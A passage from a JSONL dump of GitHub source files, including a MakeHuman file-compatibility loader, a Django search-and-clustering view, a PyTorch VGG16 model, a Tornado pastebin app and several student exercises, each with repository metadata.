fin.seek(pos)\n\n data = fin.read(n)\n if b'\\n' in data:\n lines = data.split(b'\\n')\n fout.write(lines[-1] + b''.join(reversed(buff)) + b'\\n')\n buff.clear()\n if len(lines) > 2:\n for l in lines[-2:0:-1]:\n fout.write(l + b'\\n')\n buff.append(lines[0])\n else:\n buff.append(data)\n\n n = min(pos, STEP)\n pos = max(0, pos-STEP)\n\nfin.seek(0)\ndata = fin.read(n)\nif data:\n lines = data.split(b'\\n')\n fout.write(lines[-1] + b''.join(reversed(buff)) + b'\\n')\n for l in lines[-2::-1]:\n fout.write(l+b'\\n')\nfout.close()\n\n\n","repo_name":"Zettroke/python-labs-bmstu-2019-2020","sub_path":"lab10/lab10_def.py","file_name":"lab10_def.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71144861672","text":"#입국심사 22-01-28\nn,m = map(int,input().split()) #입국심사대, 사람수\ntime =[0]*(n) #입국심사대에서 걸리는 시간\nfor i in range(n):\n t = int(input())\n time[i]=t\n\n#총 시간을 기준으로 이분 탐색\nstart = min(time) #최소시간\nend=max(time)*m #최대시간\nanswer=0\nwhile start<=end:\n mid = (start+end)//2\n count=0\n for t in time:\n count+=mid//t #주어진 시간동안 심사할 수 있는 사람 수\n\n if count long01\n \"710b4c8c-d34e-47a8-9d1d-e3f623bb8d95\": \"766436e9-63ed-4f6a-afa9-99f3acff70a8\", # mhair01 -> short01\n \"f81a4e9a-e3d7-4ecb-bdf0-16d7fd9070a4\": \"c104cd4a-1edc-43f9-8b94-f63345a44638\", # mhair02 -> short02\n }\n }\n\n skin_mapping = { \"skins/young_asian_female/young_asian_female_sweat.mhmat\": \"skins/young_asian_female/young_asian_female.mhmat\",\n \"skins/young_asian_female/young_asian_male_sweat.mhmat\": \"skins/young_asian_female/young_asian_male.mhmat\",\n \"skins/young_african_female/young_african_female_sweat.mhmat\": \"skins/young_african_female/young_african_female.mhmat\",\n \"skins/young_african_female/young_african_male_sweat.mhmat\": \"skins/young_african_female/young_african_male.mhmat\",\n \"skins/young_caucasian_female/young_caucasian_female_sweat.mhmat\": \"skins/young_caucasian_female/young_caucasian_female.mhmat\",\n \"skins/young_caucasian_female/young_caucasian_male_sweat.mhmat\": \"skins/young_caucasian_female/young_caucasian_male.mhmat\"\n }\n\n def getModifierMapping(self):\n if self.modifier_mapping is None:\n self.modifier_mapping = dict()\n with open(getpath.getSysDataPath('modifiers/mh_1-0_modifier_mapping.csv'), 'r', encoding='utf-8') as f:\n csvreader = csv.reader(f, delimiter=',', quotechar='\"')\n for r_idx, row in enumerate(csvreader):\n if r_idx == 0:\n # First line is header, drop it\n continue\n if row[0]:\n self.modifier_mapping[row[0]] = (row[1], bool(row[2]))\n return self.modifier_mapping\n\n def loadProperty(self, line_data, default_load_callback, strict):\n prop = line_data[0]\n if prop in ['tags', 'camera', 'subdivide']:\n default_load_callback(line_data)\n return\n if prop == 'skeleton':\n skeltype = line_data[1]\n if skeltype in self.skel_mapping:\n skel = self.skel_mapping[skeltype]\n if skel:\n default_load_callback([\"skeleton\", skel])\n else:\n log.warning(\"There is no good replacement for MH v1.0 rig %s\" % skeltype)\n elif prop == 'skinMaterial':\n mat = line_data[1]\n if mat in self.skin_mapping:\n default_load_callback([\"skinMaterial\", self.skin_mapping[mat]])\n else:\n default_load_callback(line_data)\n elif prop in self.target_mapping:\n target_name = line_data[1]\n value = float(line_data[2])\n\n if prop == \"custom\":\n modifier_name = \"custom/%s\" % target_name\n default_load_callback([\"modifier\", modifier_name, value])\n return\n\n modifier_name = self.targetToModifier(prop, target_name)\n new_modifier = self.mapModifier(modifier_name, value)\n\n if new_modifier:\n modifier_name, value = new_modifier\n else:\n log.warning(\"No 1.0 -> 1.1 mapping found for modifier %s\", modifier_name)\n\n default_load_callback([\"modifier\", modifier_name, value])\n elif prop in self.proxy_mapping:\n mapping = self.proxy_mapping[prop]\n name = line_data[1]\n pxy = line_data[2]\n if pxy in mapping:\n default_load_callback([prop, name, mapping[pxy]])\n else:\n default_load_callback(line_data)\n\n else:\n default_load_callback(line_data)\n\n def targetToModifier(self, target_savename, target_name):\n \"\"\"\n Map a target and savename, as stored in 1.0.x MHM files\n to the name of the corresponding modifier (in 1.0).\n Returns the MH 1.0.x modifier name corresponding to that\n target.\n \"\"\"\n mapping = self.target_mapping[target_savename]\n if target_name in mapping:\n return mapping[target_name]\n\n tokens = target_name.split('-')\n if '-'.join(tokens[-2:]) in self.trail_tokens:\n target_name = '-'.join(tokens[:-2]+[self.trail_tokens['-'.join(tokens[-2:])]])\n\n if tokens[0] in self.leading_tokens:\n modifier_name = \"%s/%s\" % (self.leading_tokens[tokens[0]], target_name)\n elif '-'.join(tokens[:2]) in self.leading_tokens:\n modifier_name = \"%s/%s\" % (self.leading_tokens['-'.join(tokens[:2])], target_name)\n else:\n modifier_name = \"%s/%s\" % (tokens[0], target_name)\n return modifier_name\n\n def mapModifier(self, modifier_name, value):\n \"\"\"\n Map a MH 1.0.x modifier name and a value for it to a modifier\n in MH 1.1.x and the corresponding value.\n \"\"\"\n mapping = self.getModifierMapping()\n result = mapping.get(modifier_name, None)\n if result is None:\n return None\n new_modifier_name, invert_value = result\n if invert_value:\n value = -value\n return (new_modifier_name, value)\n\n def getAcceptedVersion(self):\n return (1, 0)\n\n\nclass MHM11Loader(object):\n\n def loadProperty(self, line_data, default_load_callback, strict):\n if line_data[0] == 'tags':\n line_data[0] = 'name'\n default_load_callback(line_data)\n else:\n default_load_callback(line_data)\n\n def getAcceptedVersion(self):\n return(1, 1)\n\n\ndef getMHMLoader(version):\n for loader in mhm_loaders:\n if all([(i < len(version) and v == version[i]) for i, v in enumerate(loader.getAcceptedVersion())]):\n return loader\n raise RuntimeError(\"No suitable MHM backward compatibility loader found for version %s\" % (version, ))\n\ndef loadMHM(version, lines, default_load_callback, strict=False):\n version_ = _parse_version(version)\n if version_ is None:\n raise RuntimeError(\"Failed to parse version %s\" % version)\n\n fprog = progress.Progress(len(lines))\n loader = getMHMLoader(version_)\n for lineData in lines:\n lineData = lineData.strip().split()\n loader.loadProperty(lineData, default_load_callback, strict)\n fprog.step()\n\n\nmhm_loaders = [ MHM10Loader(), MHM11Loader() ]\n\n","repo_name":"makehumancommunity/makehuman","sub_path":"makehuman/apps/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":14368,"program_lang":"python","lang":"en","doc_type":"code","stars":1090,"dataset":"github-code","pt":"67"} +{"seq_id":"10100413759","text":"from functions import *\nimport re\npath = './clase_11/data_stark.json'\nlista_heroes = parse_json(path)\n\n\ndef menu_principal(lista: list):\n '''\n Función principal que imprime el menu y toma los datos del cliente para mostrar/guardar los datos a elección\n Recibe la lista de heroes\n '''\n while True:\n menu_app()\n answer = input('\\nElija una opcion:\\n> ')\n if re.search('^[1-6]{1}$', answer):\n if answer == '1':\n aux_answer = input('Elija la cantidad de heroes a listar:\\n> ')\n final_listar_heroes(lista, aux_answer)\n elif answer == '2':\n aux_answer = input(\n 'Elija el orden que desea recibir los datos [\"asc\"]: Ascendente | [\"desc\"]: Descendente:\\n> ')\n final_ordenar_listar_altura(lista, aux_answer)\n elif answer == '3':\n aux_answer = input(\n 'Elija el orden que desea recibir los datos [\"asc\"]: Ascendente | [\"desc\"]: Descendente:\\n> ')\n final_ordenar_listar_fuerza(lista, aux_answer)\n elif answer == '4':\n aux_key = input(\n 'Escriba qué dato numérico desea calcular el promedio [\"altura\", \"peso\" o \"fuerza]\\n> ')\n aux_tipo = input(\n 'Elija si desea evaluar por menor o mayor en el promedio [\"menor\"]: Buscar los menores | [\"mayor\"]: Buscar los mayores:\\n> ')\n final_listar_heroes_segun_promedio(lista, aux_key, aux_tipo)\n elif answer == '5':\n final_listar_heroes_inteligencia(lista)\n elif answer == '6':\n break\n else:\n print('[ERROR] Elija una opción correcta')\n continue\n\n\nmenu_principal(lista_heroes)\n","repo_name":"JuliFerz/labo-progra_1","sub_path":"clase_11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17063397918","text":"from __future__ import print_function\n\nimport collections\nimport json\nimport uuid\nfrom urllib.request import urlopen\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.template.response import TemplateResponse\n\n# from research.templatetags.research_extras import all_snippets\nfrom research.data.misc_utils import get_advanced_query, get_date_parameter, format_for_gallery\n\nfrom research.data.sesson_keys import SESSION_FULL_TEXT_SEARCH, SESSION_VALUE_CHANGED, SESSION_ENGINE_SEARCH, \\\n SESSION_SDATE_SEARCH, SESSION_EDATE_SEARCH, SESSION_BOOL_AND_SEARCH, SESSION_BOOL_NOT_SEARCH, \\\n SESSION_BOOL_OR_SEARCH, SESSION_LOC_SEARCH, SESSION_IS_CHANGED_KEY, SESSION_VALUE_NOT_CHANGED\nfrom model.myutils.clustering_utils import map_cluster_to_data, summarize_clusters\nfrom model.myutils.data_utils import get_sentences, map_cluster_to_data_expanded, map_cluster_to_doc_expanded\nfrom model.myutils.graph_builder import build_doc_graph, connect_mm_doc_to_clusters, expand_view\nfrom model.myutils.my_files_utils import save_json, read_json\n\nfrom model.research.clusters import get_agg_clust_assignment\nfrom model.research.embeddings import get_sentence_embedding, search_through_embeddings, get_snip_view\nfrom model.research.results_aggregate import get_all_vertical_results\n\n\nfrom django.http import HttpResponse\nfrom django.views.decorators.clickjacking import xframe_options_exempt\n\n@xframe_options_exempt\ndef index(request):\n print('here')\n\n if request.session.get('uid', None) is None:\n request.session['uid'] = str(uuid.uuid4())\n\n full_text_search = \"\"\n lookup_level = \"\"\n date_start = \"\"\n date_end = \"\"\n search_engine = \"\"\n boolean_and = \"\"\n boolean_or = \"\"\n boolean_not = \"\"\n location = \"\"\n\n parameters = dict()\n\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_NOT_CHANGED\n\n if 'ft_search' in request.GET:\n full_text_search = request.GET['ft_search']\n\n if request.session.get(SESSION_FULL_TEXT_SEARCH, SESSION_VALUE_CHANGED) != full_text_search:\n request.session[SESSION_FULL_TEXT_SEARCH] = full_text_search\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n if 'lookup' in request.GET:\n lookup_level = request.GET['lookup']\n\n if 'engine' in request.GET:\n search_engine = request.GET['engine'].lower()\n parameters['engine'] = search_engine\n\n if request.session.get(SESSION_ENGINE_SEARCH, SESSION_VALUE_CHANGED) != search_engine:\n request.session[SESSION_ENGINE_SEARCH] = search_engine\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n else:\n search_engine = 'google'\n parameters['engine'] = search_engine\n\n # if search_engine is None or search_engine == '':\n # search_engine = 'qwant'\n\n if 'sdate' in request.GET and 'edate' in request.GET:\n date_start = request.GET['sdate']\n date_end = request.GET['edate']\n\n if request.session.get(SESSION_SDATE_SEARCH, SESSION_VALUE_CHANGED) != date_start:\n request.session[SESSION_SDATE_SEARCH] = date_start\n request.session[SESSION_EDATE_SEARCH] = date_end\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n if search_engine == '' or search_engine == 'google':\n parameters['tbs'] = get_date_parameter(date_start, date_end, search_engine)\n else:\n parameters['freshness'] = get_date_parameter(date_start, date_end, search_engine)\n\n if 'andInput' in request.GET:\n boolean_and = request.GET['andInput']\n\n if request.session.get(SESSION_BOOL_AND_SEARCH, SESSION_VALUE_CHANGED) != boolean_and:\n request.session[SESSION_BOOL_AND_SEARCH] = boolean_and\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n if 'orInput' in request.GET:\n boolean_or = request.GET['orInput']\n\n if request.session.get(SESSION_BOOL_OR_SEARCH, SESSION_VALUE_CHANGED) != boolean_or:\n request.session[SESSION_BOOL_OR_SEARCH] = boolean_or\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n if 'notInput' in request.GET:\n boolean_not = request.GET['notInput']\n\n if request.session.get(SESSION_BOOL_NOT_SEARCH, SESSION_VALUE_CHANGED) != boolean_not:\n request.session[SESSION_BOOL_NOT_SEARCH] = boolean_not\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n if 'loc' in request.GET:\n location = request.GET['loc']\n\n if search_engine == '' or search_engine == 'google':\n parameters['cr'] = 'country' + location\n else:\n parameters['loc'] = location\n\n if request.session.get(SESSION_LOC_SEARCH, SESSION_VALUE_CHANGED) != location:\n request.session[SESSION_LOC_SEARCH] = location\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n # if False:\n if request.session.get(SESSION_IS_CHANGED_KEY, SESSION_VALUE_NOT_CHANGED) == SESSION_VALUE_CHANGED:\n # search_engine = 'qwant'\n\n parameters['q'] = get_advanced_query(boolean_and, boolean_or, boolean_not, full_text_search)\n\n parameters_str = ''\n\n for k, v in parameters.items():\n if k == 'q':\n parameters_str = v + parameters_str\n elif k == 'loc':\n parameters_str = k + ':' + v\n elif k == 'engine':\n print('hehe')\n else:\n parameters_str = '&' + k + '=' + v\n\n query = parameters_str\n\n print(\"test\")\n search_results = get_all_vertical_results(query=query, num=100,\n engine=search_engine) # Initiate search results in real time\n search_results_sentences = get_sentences(\n search_results) # Combine all the vailable text for embeddings with preprocessing\n search_result_sentence_embeddings = get_sentence_embedding(\n search_results_sentences) # Get search results embeddings\n\n snip_view_process = search_through_embeddings(query, search_result_sentence_embeddings,\n search_results) # save the snip view ordered by cosine relevancy\n\n # perform agg clustering\n search_results_cluster_assignment = get_agg_clust_assignment(search_result_sentence_embeddings,\n 13.48) # [1, 2,23...]\n # replace cluster assignment to data: clust1 -> snippet 1, 2, .....\n bucket_cluster_assignment_sentences = map_cluster_to_data(search_results_cluster_assignment,\n search_results_sentences)\n # bind cluster assignment to the data snippet1 -> url, date, cluster_assignment\n assigned_search_results_cluster = map_cluster_to_data_expanded(search_results_cluster_assignment,\n search_results)\n # get each cluster summary: clust [2]-> summary, clust [3]-> summary\n summarized_clusters = summarize_clusters(bucket_cluster_assignment_sentences)\n\n # Build MM Docs\n G = build_doc_graph(assigned_search_results_cluster, summarized_clusters)\n\n # get mm docs\n mm_doc_sentences = list()\n od = collections.OrderedDict(sorted(summarized_clusters.items()))\n for k, item in od.items():\n mm_doc_sentences.append(item)\n\n mm_doc_sentences_embeddings = get_sentence_embedding(mm_doc_sentences)\n\n # perform agg clust on sentences\n mm_doc_clusters = get_agg_clust_assignment(mm_doc_sentences_embeddings, 15.52)\n # replace cluster assignment to data: clust [1] -> snippet 1, 2, .....\n bucket_of_mm_doc_cluster = map_cluster_to_data(mm_doc_clusters, mm_doc_sentences)\n # For Summarization\n summarized_mm_doc_clusters = summarize_clusters(bucket_of_mm_doc_cluster)\n # bind cluster assignment to the data mm_doc_1 -> cluster_assignment\n expanded_dict_of_mm_clusters = map_cluster_to_doc_expanded(mm_doc_clusters, od)\n\n # replace cluster with summary data\n # building graph\n G = connect_mm_doc_to_clusters(G, expanded_dict_of_mm_clusters, summarized_mm_doc_clusters)\n expand_view(G)\n # Wait for result from all processes\n # snip_view_process.join()\n\n clust_view = read_json('clust_view')\n doc_view = read_json('doc_view')\n snip_view = read_json('snip_view')\n\n wikilook = \"\"\n # Change view depending on the granularity selected\n if lookup_level == 'doc' or True:\n return render(request, 'content_doc.html',\n {'clusters': clust_view, 'documents': doc_view, 'snippets': snip_view})\n elif lookup_level == 'snip':\n snip_view = format_for_gallery(snip_view)\n # full_text_search = \"Mcdonald\"\n\n import string\n full_text_search = full_text_search.translate(str.maketrans('', '', string.punctuation))\n import spacy\n sp = spacy.load('en_core_web_sm')\n sen = sp(full_text_search)\n\n lookup = \"\"\n\n for word in sen:\n if word.pos_ == \"NOUN\" or word.pos_ == \"PROPN\":\n lookup = lookup + word.text + \" \"\n\n # from textblob import TextBlob\n # wiki = TextBlob(full_text_search)\n # print(wiki.noun_phrases)\n lookup = lookup.split(' ')[0]\n\n try:\n import requests\n response = requests.get(\"http://en.wikipedia.org/w/api.php?action=query&prop=description&titles=\" +\n lookup +\n \"&prop=extracts&exintro&explaintext&format=json&redirects&callback=?\")\n\n # summary = response.json()\n test = response.content.decode(\"UTF-8\")\n test = test[5:len(test) - 1]\n j = json.loads(test)\n y = j['query']['pages'].popitem()\n wikilook = y[1]['extract']\n\n wikilook = {\n 'query': lookup,\n 'content': wikilook.replace('. ', '.

')\n }\n finally:\n if wikilook:\n return render(request, 'content_snip.html',\n {'clusters': clust_view, 'documents': doc_view, 'snippets': snip_view, 'wiki': wikilook})\n else:\n return render(request, 'content_snip.html',\n {'clusters': clust_view, 'documents': doc_view, 'snippets': snip_view})\n else:\n return render(request, 'content.html', {'clusters': clust_view, 'documents': doc_view, 'snippets': snip_view})\n\n\ndef get_document_preview(request):\n # TODO Update the doc review panel to take into consideration of the UUID\n doc_id = request.GET['doc_id']\n doc_view = read_json('doc_view')\n snip_view = read_json('snip_view')\n snip_list = doc_view[doc_id]['snips_list']\n\n snippets = []\n for snip_id in snip_list:\n snippets.append(snip_view[snip_id])\n\n return TemplateResponse(request, 'doct_preview.html',\n {'doc_id': doc_id, 'documents': doc_view, 'snippets': snip_view, 'snip_list': snippets})\n # return HttpResponse(all_snippets(snip_view, snip_list, 0))\n\n\ndef homepage(request):\n return render(request, 'start_page.html', {})\n\n# TODO Hide explore more cluster when it is empty\n# Case 1: When it is all empty including no further multimedia documents to explore\n# Case2: When only explore more cluster is empty yet there are multimedia documents further to explore\n# TODO: Decrease the markjs highlight opacity\n#TODO: delay the exectuion of the date and engine button if the query is newly typed.\n#TODO: Error when organic results not found on the following req [30/Sep/2020 11:55:08] \"GET /?lookup=clust&ft_search=Pakistan¬Input=coronavirus&sdate=08/01/2020&edate=08/31/2020 HTTP/1.1\" 500 90430\n","repo_name":"HQuser/arkamed","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18955180913","text":"import os\nfrom django.contrib import admin\nfrom django.conf.urls.defaults import *\nimport treebeard\nfrom tbexample.views import convo, load_random_data, delete_node, delete_all\nfrom tbexample.views import choose\n\nadmin.autodiscover()\n\nbaseurl = r'^(?Pmp|al|ns)/'\nlurls = [\n (r'loaddata/$', load_random_data, 'load-data'),\n (r'delete_all/$', delete_all, 'delete-all'),\n (r'(?P\\d+)/delete/$', delete_node, 'delete-node'),\n (r'(?P\\d+)/reply/$', convo, 'reply-view'),\n (r'(?P\\d+)/$', convo, 'node-view'),\n (r'$', convo, 'main-view')\n]\n\npath = os.path.dirname(treebeard.__file__)\nstatic_path = os.path.normpath(os.path.join(path, 'static/'))\n\nurlpatterns = patterns('',\n (r'^admin/', include(admin.site.urls)),\n (r'^static/(?P.*)$', 'django.views.static.serve',\n {'document_root': static_path, 'show_indexes': True}))\n\nfor pat, view, name in lurls:\n urlpatterns += patterns('', url('%s%s' % (baseurl, pat), view, name=name))\nurlpatterns += patterns('', url('^$', choose, name='choose-tree'))\n","repo_name":"bluearth/tbpoly","sub_path":"tbexample/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25743995780","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\n \nclass VGG16(nn.Module):\n def __init__(self,num_classes=10, if_dropout=True):\n super(VGG16, self).__init__()\n \n self.if_dropout = if_dropout\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3, padding=1)#64 32 32\n self.bn1 = nn.BatchNorm2d(64)\n self.relu1 = nn.ReLU(inplace=False)\n self.conv2 = nn.Conv2d(64, 64, kernel_size=3, padding=1)#64 32 32\n self.bn2 = nn.BatchNorm2d(64)\n self.relu2 = nn.ReLU(inplace=False)\n self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)#64 16 16\n self.conv3 = nn.Conv2d(64, 128, kernel_size=3, padding=1)#128 16 16\n self.bn3 = nn.BatchNorm2d(128)\n self.relu3 = nn.ReLU(inplace=False)\n self.conv4 = nn.Conv2d(128, 128, kernel_size=3, padding=1)#128 16 16\n self.bn4 = nn.BatchNorm2d(128)\n self.relu4 = nn.ReLU(inplace=False)\n self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2)#128 8 8\n self.conv5 = nn.Conv2d(128, 256, kernel_size=3, padding=1)#256 8 8\n self.bn5 = nn.BatchNorm2d(256)\n self.relu5 = nn.ReLU(inplace=False)\n self.conv6 = nn.Conv2d(256, 256, kernel_size=3, padding=1)#256 8 8\n self.bn6 = nn.BatchNorm2d(256)\n self.relu6 = nn.ReLU(inplace=False)\n self.conv7 = nn.Conv2d(256, 256, kernel_size=3, padding=1)#256 8 8\n self.bn7 = nn.BatchNorm2d(256)\n self.relu7 = nn.ReLU(inplace=False)\n self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2)#256 4 4\n self.conv8 = nn.Conv2d(256, 512, kernel_size=3, padding=1)#512 4 4\n self.bn8 = nn.BatchNorm2d(512)\n self.relu8 = nn.ReLU(inplace=False)\n self.conv9 = nn.Conv2d(512, 512, kernel_size=3, padding=1)#512 4 4\n self.bn9 = nn.BatchNorm2d(512)\n self.relu9 = nn.ReLU(inplace=False)\n self.conv10 = nn.Conv2d(512, 512, kernel_size=3, padding=1)#512 4 4\n self.bn10 = nn.BatchNorm2d(512)\n self.relu10 = nn.ReLU(inplace=False)\n self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2)#512 2 2\n self.conv11 = nn.Conv2d(512, 512, kernel_size=3, padding=1)#512 2 2\n self.bn11 = nn.BatchNorm2d(512)\n self.relu11 = nn.ReLU(inplace=False)\n self.conv12 = nn.Conv2d(512, 512, kernel_size=3, padding=1)#512 2 2\n self.bn12 = nn.BatchNorm2d(512)\n self.relu12 = nn.ReLU(inplace=False)\n self.conv13 = nn.Conv2d(512, 512, kernel_size=3, padding=1)#512 2 2\n self.bn13 = nn.BatchNorm2d(512)\n self.relu13 = nn.ReLU(inplace=False)\n self.pool5 = nn.MaxPool2d(kernel_size=2, stride=2)#512 1 1\n self.fc1 = nn.Linear(512, num_classes)\n \n self.drop= nn.Dropout( p = 0.3)\n \n def forward(self,x):\n feature_dict = {}\n \n feat_conv1 = self.conv1(x)\n feat_bn1 = self.bn1(feat_conv1)\n feat_conv1_relu = self.relu1(feat_bn1)\n feat_conv2 = self.conv2(feat_conv1_relu)\n feat_bn2 = self.bn2(feat_conv2)\n feat_conv2_relu = self.relu2(feat_bn2)\n feat_pool1 = self.pool1(feat_conv2_relu)\n \n feat_conv3 = self.conv3(feat_pool1)\n feat_bn3 = self.bn3(feat_conv3)\n feat_conv3_relu = self.relu3(feat_bn3)\n feat_conv4 = self.conv4(feat_conv3_relu)\n feat_bn4 = self.bn4(feat_conv4)\n feat_conv4_relu = self.relu4(feat_bn4)\n feat_pool2 = self.pool2(feat_conv4_relu)\n \n feat_conv5 = self.conv5(feat_pool2)\n feat_bn5 = self.bn5(feat_conv5)\n feat_conv5_relu = self.relu5(feat_bn5)\n feat_conv6 = self.conv6(feat_conv5_relu)\n feat_bn6 = self.bn6(feat_conv6)\n feat_conv6_relu = self.relu6(feat_bn6)\n feat_conv7 = self.conv7(feat_conv6_relu)\n feat_bn7 = self.bn7(feat_conv7)\n feat_conv7_relu = self.relu7(feat_bn7)\n feat_pool3 = self.pool3(feat_conv7_relu)\n \n feat_conv8 = self.conv8(feat_pool3)\n feat_bn8 = self.bn8(feat_conv8)\n feat_conv8_relu = self.relu8(feat_bn8)\n feat_conv9 = self.conv9(feat_conv8_relu)\n feat_bn9 = self.bn9(feat_conv9)\n feat_conv9_relu = self.relu9(feat_bn9)\n feat_conv10 = self.conv10(feat_conv9_relu)\n feat_bn10 = self.bn10(feat_conv10)\n feat_conv10_relu = self.relu10(feat_bn10)\n feat_pool4 = self.pool4(feat_conv10_relu)\n \n feat_conv11 = self.conv11(feat_pool4)\n feat_bn11 = self.bn11(feat_conv11)\n feat_conv11_relu = self.relu11(feat_bn11)\n feat_conv12 = self.conv12(feat_conv11_relu)\n #feat_conv12 = self.conv12(feat_pool4)\n feat_bn12 = self.bn12(feat_conv12)\n feat_conv12_relu = self.relu12(feat_bn12)\n feat_conv13 = self.conv13(feat_conv12_relu)\n feat_bn13 = self.bn13(feat_conv13)\n feat_conv13_relu = self.relu13(feat_bn13)\n feat_pool5 = self.pool5(feat_conv13_relu)\n \n feat_pool5 = feat_pool5.view(feat_pool5.size(0),-1)\n \n \n after_dropout= self.drop(feat_pool5)\n\n feat_fc1 = self.fc1(after_dropout)\n \n return feat_fc1\n","repo_name":"ltl7155/NPC","sub_path":"deephunter/models/vgg_cifar10.py","file_name":"vgg_cifar10.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"39017593583","text":"# Created by Chen at 12/18/22\nfrom torch_geometric.graphgym.register import register_config\nfrom yacs.config import CfgNode as CN\n\n\n@register_config('vn_cfg')\ndef vn_cfg(cfg):\n \"\"\"Deepset VN config\n \"\"\"\n cfg.dsvn = CN()\n cfg.dsvn.reduction='mean'\n cfg.dsvn.nonlinear='relu'\n cfg.dsvn.n_layers = 1\n cfg.dsvn.batchnorm = True\n\n\n\n","repo_name":"Chen-Cai-OSU/MPNN-GT-Connection","sub_path":"GraphGPS/graphgps/config/vn_config.py","file_name":"vn_config.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"28188796759","text":"# -*- coding: utf-8 *-*\nimport re\nimport motor\nimport bcrypt\nimport datetime\nimport traceback\nimport tornado.gen\nimport tornado.web\nimport simplejson as json\nfrom bson import json_util\nfrom tpaste import messages, forms\nfrom tpaste.helpers import stringhelper, mailhelper\n\n\nclass BaseMultiDict(object):\n\n def __init__(self, handler):\n self.handler = handler\n\n def __iter__(self):\n return iter(self.handler.request.arguments)\n\n def __len__(self):\n return len(self.handler.request.arguments)\n\n def __contains__(self, name):\n return (name in self.handler.request.arguments)\n\n def getlist(self, name):\n return self.handler.get_arguments(name, strip=False)\n\n\nclass TPasteHandler(tornado.web.RequestHandler):\n\n @property\n def db(self):\n return self.application.db\n\n @property\n def smtp(self):\n return self.application.smtp\n\n def __init__(self, *args, **kwargs):\n super(TPasteHandler, self).__init__(*args, **kwargs)\n\n def get_dict_arguments(self):\n return BaseMultiDict(self)\n\n def write_error(self, status_code, **kwargs):\n params = {}\n if self.settings.get('debug') and 'exc_info' in kwargs:\n params['stack_trace'] = ''.join([line for line in\n traceback.format_exception(*kwargs['exc_info'])])\n if status_code in messages.errors.keys():\n self.render('error.html', message=messages.errors[status_code],\n **params)\n else:\n self.write('Error no manejado. ' + str(self._status_code))\n\n def write_json(self, content):\n self.write(json.dumps(content, default=json_util.default))\n\n def write_ajax_response(self, message, action=\"content\"):\n self.write_json({\"action\": action, \"message\": message})\n\n def write_ajax_redirect(self, url):\n self.write_ajax_response(url, action=\"redirect\")\n\n def write_ajax_error(self, error):\n self.write_ajax_response(error, action=\"error\")\n\n\nclass NotFoundHandler(TPasteHandler):\n\n def get(self):\n raise tornado.web.HTTPError(404)\n\n\nclass HomeHandler(TPasteHandler):\n\n def get(self):\n lang = self.get_argument('lang', None)\n if lang not in messages.languages.keys() + [None]:\n raise tornado.web.HTTPError(404)\n self.render('home.html', lang=lang)\n\n\nclass SupportedLanguagesHandler(TPasteHandler):\n\n def get(self):\n self.render(\"languages.html\", languages=messages.languages)\n\n\nclass LanguageHandler(TPasteHandler):\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def get(self, language):\n language = language.replace(' ', '+')\n if language not in messages.languages:\n raise tornado.web.HTTPError(404,\n '%s is a unsupported language.' % language)\n cursor = self.db.snippets.find({'syntax': language},\n sort=[('date', -1)], limit=20)\n snippets = yield motor.Op(cursor.to_list)\n self.render('language.html', snippets=snippets, lang_code=language,\n lang_name=messages.languages[language])\n\n\nclass NewSnippetHandler(TPasteHandler):\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def post(self):\n form = forms.NewSnippetForm(self.get_dict_arguments())\n if not form.validate():\n self.write(form.errors)\n self.finish()\n else:\n while True:\n token = stringhelper.random_base62()\n s = yield motor.Op(self.db.snippets.find_one, {'token': token},\n fields={'_id': 1})\n if not s:\n break\n snippet = {'title': self.get_argument('title'),\n 'syntax': self.get_argument('syntax'),\n 'content': self.get_argument('content'),\n 'token': token,\n 'date': datetime.datetime.now()}\n if self.current_user:\n snippet['author'] = self.current_user['']\n else:\n snippet['author'] = self.get_argument('author')\n yield motor.Op(self.db.snippets.insert, snippet)\n self.redirect('/%s' % token)\n\n\nclass SnippetHandler(TPasteHandler):\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def get(self, token=None):\n if token:\n snippet = yield motor.Op(self.db.snippets.find_one,\n {'token': token})\n else:\n snippet = yield motor.Op(self.db.snippets.find_one, {},\n sort=[('date', -1)])\n if not 'html' in snippet:\n from pygments import highlight\n from pygments.lexers import get_lexer_by_name\n from pygments.formatters import HtmlFormatter\n lexer = get_lexer_by_name(snippet['syntax'], stripall=True)\n formatter = HtmlFormatter(linenos=True, cssclass='source')\n snippet['html'] = highlight(snippet['content'], lexer, formatter)\n yield motor.Op(self.db.snippets.save, snippet)\n self.render('snippet.html', snippet=snippet)\n\n\nclass RawSnippetHandler(TPasteHandler):\n\n 